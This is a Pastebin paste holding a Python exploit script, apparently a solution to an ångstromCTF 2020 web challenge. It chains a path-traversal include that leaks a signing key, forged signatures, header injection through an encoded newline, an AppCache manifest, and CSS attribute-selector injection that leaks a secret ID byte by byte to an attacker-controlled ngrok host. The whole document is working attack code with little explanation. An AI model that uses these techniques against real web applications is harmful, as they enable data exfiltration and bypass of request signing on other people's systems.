Advertisement
Guest User

Untitled

a guest
Mar 18th, 2020
1,023
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.61 KB | None | 0 0
  1. from Crypto.Cipher import PKCS1_OAEP
  2. from Crypto.Hash import SHA256
  3. from Crypto.PublicKey import RSA
  4. import requests
  5. import json
  6.  
  7. ubi = 'https://ubi.2020.chall.actf.co'
  8. flags = 'https://flags.2020.chall.actf.co'
  9. local = 'https://1e48639b.ngrok.io'
  10.  
  11. known = ''
  12.  
  13. d = requests.get(flags).text.split("/download/")[1].split("/flag")[0]
  14. r = requests.post(ubi+'/build', data={'src': '#include "../'+d+'/config.json"', 'key': 'asdf'})
  15. key = RSA.import_key(json.loads("{"+r.json()['message'].split(" {")[1].split("}")[0]+"}")["key"])
  16.  
  17. if len(known) < 16:
  18.     style = ''.join('.tile:nth-child(4) a[href^="'+flags+'/download/'+known+hex(g)[2:].zfill(2)+'"]{background-image:url('+local+'/'+hex(g)[2:].zfill(2)+'.png);}' for g in range(0x100))
  19.     css = requests.post(ubi+'/build', data={'src': style, 'key': key.export_key('PEM', pkcs=8)+b'\n'}).json()['message'][6:22]
  20.     csig = PKCS1_OAEP.new(key).encrypt(SHA256.new(b'content-type: text/css\nx-ubi-src: 1\nx-ubi-id: '+css.encode('ascii')+b'\nx-ubi-key: '+SHA256.new(key.export_key('PEM', pkcs=8)+b'\n').hexdigest().encode('ascii')).digest()).hex()
  21.     curl = '/download/'+css+'/flag?content-type=text/css&x-ubi-src=1&sig='+csig
  22.  
  23.     manifest = requests.post(ubi+'/build', data={'src': 'CACHE MANIFEST\nCACHE:\n/\nNETWORK:\n'+local+'\nCHROMIUM-INTERCEPT:\n/style.css return '+curl, 'key': key.export_key('PEM', pkcs=8)+b'\n'}).json()['message'][6:22]
  24.     msig = PKCS1_OAEP.new(key).encrypt(SHA256.new(b'content-type: text/cache-manifest\nx-ubi-src: 1\nx-ubi-id: '+manifest.encode('ascii')+b'\nx-ubi-key: '+SHA256.new(key.export_key('PEM', pkcs=8)+b'\n').hexdigest().encode('ascii')).digest()).hex()
  25.     murl = flags+'/download/'+manifest+'/flag?content-type=text/cache-manifest&x-ubi-src=1&sig='+msig
  26.  
  27.     i = requests.post(ubi+'/build', data={'src': '<html manifest="'+murl+'">', 'key': key.export_key('PEM', pkcs=8)+b'\n'}).json()['message'][6:22]
  28.     sig = PKCS1_OAEP.new(key).encrypt(SHA256.new(b'content-type: text/html\nrefresh: 8; '+flags.encode('ascii')+b'\nx-appcache-allowed: /\nx-ubi-src: 1\nx-ubi-id: '+i.encode('ascii')+b'\nx-ubi-key: '+SHA256.new(key.export_key('PEM', pkcs=8)+b'\n').hexdigest().encode('ascii')).digest()).hex()
  29.     url = flags+'/download/'+i+'/flag?content-type=text/html%0arefresh: 8; '+flags+'%0ax-appcache-allowed:%20/&x-ubi-src=1&sig='+sig
  30.     print(url)
  31. else:
  32.     sig = PKCS1_OAEP.new(key).encrypt(SHA256.new(b'x-ubi-src: 1\nx-ubi-id: '+known.encode('ascii')+b'\nx-ubi-key: '+SHA256.new(key.export_key('PEM', pkcs=8)+b'\n').hexdigest().encode('ascii')).digest()).hex()
  33.     url = flags+'/download/'+known+'/flag?x-ubi-src=1&sig='+sig
  34.     print(requests.get(url, headers={'referer': flags+'/'}).text)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement